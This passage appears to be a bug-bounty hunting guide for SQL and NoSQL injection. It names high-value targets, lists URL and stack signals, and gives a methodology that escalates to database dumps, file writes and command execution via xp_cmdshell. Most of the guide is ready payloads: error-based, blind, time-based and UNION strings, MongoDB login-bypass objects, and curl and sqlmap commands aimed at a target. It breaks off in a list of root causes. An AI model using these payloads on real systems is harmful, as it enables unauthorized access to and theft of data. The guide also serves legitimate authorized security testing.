hunt-sqli

Crown Jewel Targets

SQL injection remains one of the highest-paying vulnerability classes in bug bounty because it directly threatens data confidentiality, integrity, and availability at scale.

Highest-value targets:

• SaaS platforms with multi-tenant databases — one injection can expose all customer data
• E-commerce/payment systems — PII, card data, transaction records
• Search endpoints — user-controlled input passed directly to queries (e.g., Rockstar Games /search)
• Analytics/tracking subdomains — often built fast, tested less (e.g., sctrack.email.uber.com.cn)
• Third-party plugins on enterprise installs — WordPress plugins, CMS extensions running on corporate domains (Uber's Huge IT Video Gallery)
• Internal tooling exposed externally — Apache Airflow, GitHub Enterprise, admin dashboards
• NoSQL backends (MongoDB) — often overlooked, same injection class, different syntax

Asset types that pay most:

• Production APIs with /search, /filter, /sort, /report parameters
• Subdomains with legacy stacks (.cn, .co, .io regional variants)
• Self-hosted open-source tools (Airflow, GitLab, Jenkins) on bounty scope
• Email tracking and analytics infrastructure

Attack Surface Signals

URL patterns that suggest injectable parameters:

/search?q=
/filter?category=
/sort?by=&order=
/report?start_date=&end_date=
/api/v1/items?id=
/index.php?id=
/gallery?album_id=
/track?uid=&campaign=
?page=&limit=&offset=

Response header signals:

• X-Powered-By: PHP — likely MySQL/PostgreSQL backend
• Server: Apache + PHP — classic LAMP stack
• X-Powered-By: Express — possible MongoDB/NoSQL backend
• Database error messages leaking in responses (MySQL, PostgreSQL, MSSQL error strings)

JavaScript patterns indicating dynamic query construction:

// Look for these in JS bundles
fetch(`/api/search?q=${userInput}`)
$.ajax({ url: '/filter?sort=' + param })
axios.get('/report?from=' + startDate + '&to=' + endDate)

Tech stack signals:

• WordPress sites with third-party plugins (check /wp-content/plugins/)
• Apache Airflow endpoints (/admin/, /api/experimental/)
• GitHub Enterprise (/_graphql, /search, /api/v3/)
• Node.js + MongoDB combinations (check for $where, $regex in request bodies)
• PHP applications returning verbose MySQL errors

Content-type signals for NoSQL:

• Content-Type: application/json bodies with nested object parameters
• Parameters accepting arrays: param[]=value or {"key": {"$gt": ""}}

Step-by-Step Hunting Methodology

1. Enumerate all input vectors — Use Burp Suite passive scan during normal app usage. Capture every parameter: GET, POST, JSON body, HTTP headers (User-Agent, Referer, X-Forwarded-For), cookies, path segments.

2. Identify the tech stack — Check response headers, error messages, job postings, Wappalyzer, BuiltWith. Determines which payloads to prioritize (MySQL vs PostgreSQL vs MongoDB).

3. Baseline the response — Note normal response length, status code, and response time for a clean request. This is your diff baseline.

4. Send error-based probes — Inject single quote ', double quote ", backtick `, and observe for:

   • Database error messages (immediate confirmation)
   • Response length change
   • HTTP 500 errors

5. Test boolean-based blind — Send true/false conditions and compare responses:

   • param=1 AND 1=1 vs param=1 AND 1=2
   • If responses differ → likely injectable

6. Test time-based blind — When no visible difference exists:

   • MySQL: param=1 AND SLEEP(5)
   • PostgreSQL: param=1; SELECT pg_sleep(5)--
   • MSSQL: param=1; WAITFOR DELAY '0:0:5'--
   • Measure response time delta > 5 seconds = confirmed

7. For NoSQL (MongoDB) — Test object injection via JSON body and PHP-style array params:

   • Replace string value with {"$gt": ""} in JSON
   • Try param[$ne]=invalid in query strings

8. Automate confirmation — Run sqlmap on confirmed candidates with --level=3 --risk=2 to enumerate databases without manual effort.

9. Escalate impact — Attempt:

   • UNION-based extraction (enumerate columns first)
   • INFORMATION_SCHEMA dump
   • File read/write (LOAD_FILE, INTO OUTFILE) if permissions allow
   • Stacked queries for RCE (MSSQL xp_cmdshell)

10. Document the full chain — Capture Burp repeater request/response, sqlmap output, and proof of data extraction (non-sensitive fields only for report).

Payload & Detection Patterns

Initial Error-Based Probes:

'
''
`
')
"))
' OR '1'='1
' OR 1=1--
" OR 1=1--
' OR 1=1#
admin'--

Boolean-Based Blind:

' AND 1=1--   (true condition)
' AND 1=2--   (false condition)
' AND SUBSTRING(version(),1,1)='5'--
1 AND (SELECT COUNT(*) FROM users) > 0--

Time-Based Blind:

-- MySQL
' AND SLEEP(5)--
1; SELECT SLEEP(5)--

-- PostgreSQL  
'; SELECT pg_sleep(5)--
1 AND (SELECT 1 FROM pg_sleep(5))--

-- MSSQL
'; WAITFOR DELAY '0:0:5'--
1; EXEC xp_cmdshell('ping -n 5 127.0.0.1')--

-- SQLite
' AND (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(300000000/2)))))==1--

UNION-Based (enumerate columns first):

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 10--   (find column count via error)
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,database(),3--
' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--

NoSQL Injection (MongoDB):

// JSON body injection
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
{"$where": "this.username == this.password"}

// Query string injection
username[$ne]=invalid&password[$ne]=invalid
username[$regex]=.*&password[$regex]=.*

PHP Hash/Array Injection:

# Replace scalar with array
param[key]=value
param[$gt]=0
param[$ne]=null

Grep patterns for JS source hunting:

# Find unsanitized query construction in JS
grep -r "query\s*+=" src/
grep -r "WHERE.*\+" src/
grep -r "\.find({" src/ | grep -v "sanitize\|escape"
grep -rE "db\.query\(.*\+" src/

curl time-based detection:

# Baseline
curl -o /dev/null -s -w "%{time_total}\n" "https://target.com/search?q=test"

# Inject
curl -o /dev/null -s -w "%{time_total}\n" "https://target.com/search?q=test' AND SLEEP(5)--"

# SQLMap quick scan
sqlmap -u "https://target.com/search?q=test" --dbs --level=3 --risk=2 --batch

# SQLMap with POST
sqlmap -u "https://target.com/api/filter" --data="category=electronics&sort=price" --dbs --batch

# SQLMap with cookie auth
sqlmap -u "https://target.com/admin/report" --cookie="session=TOKEN" --dbs --batch --level=5

Burp Intruder payload list for column enumeration:

§1§
§1§,§1§
§1§,§1§,§1§
§1§,§1§,§1§,§1§

Common Root Causes

1. String concatenation instead of parameterized queries — The #1 root cause. Developers build SQL strings with user input directly: "SELECT * FROM items WHERE id=" + userId.

2. ORMs bypassed for "performance" — Developer switches from safe ORM to raw query for complex joins or reports: db.query("SELECT " + userColumn + " FROM table").

3. Search/filter functionality — Sorting and filtering logic is notoriously hard to parameterize (column names can't be bound), leading to allowlist bypasses or no protection at all.

4. Third-party plugin/library vulnerabilities — Developers trust installed plugins (WordPress, Joomla extensions) without auditing their query logic (Uber's Huge IT Video Gallery case).

5. Legacy codebases — Old PHP 4/5 code predating PDO/MySQLi prepared statements, still running in production on acquired assets or regional subdomains.

6. Internal tools promoted to external — Tools like Apache Airflow were designed for internal use with minimal security hardening, then exposed to authenticated external users.

7. **NoSQL